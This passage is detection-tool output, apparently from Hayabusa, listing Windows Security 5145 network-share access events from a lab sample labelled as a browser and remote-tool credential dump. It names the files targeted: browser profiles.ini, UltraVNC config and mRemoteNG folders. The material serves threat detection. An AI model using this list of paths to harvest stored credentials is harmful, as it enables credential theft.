0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.862 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.878 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.893 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.909 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\Firefox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.914 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials 
from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Comodo\IceDragon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\K-Meleon\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.926 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\Mozilla\icecat\profiles.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.942 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAMFILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramFiles(x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Program Files (x86)\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.958 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\uvnc bvba\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:15.973 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.264 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.264 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from 
Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.280 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.295 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.311 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\All Users\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.327 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.343 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.343 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password 
Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.359 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 
0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.374 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Local\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.390 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\AppData\Roaming\mRemoteNG | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.406 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 
Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 0x883836e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID5145-user file-credentials-browser dump via network share.evtx +2021-12-12 20:53:30.422 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\Recent | IP Addr: 10.23.123.11 | LID: 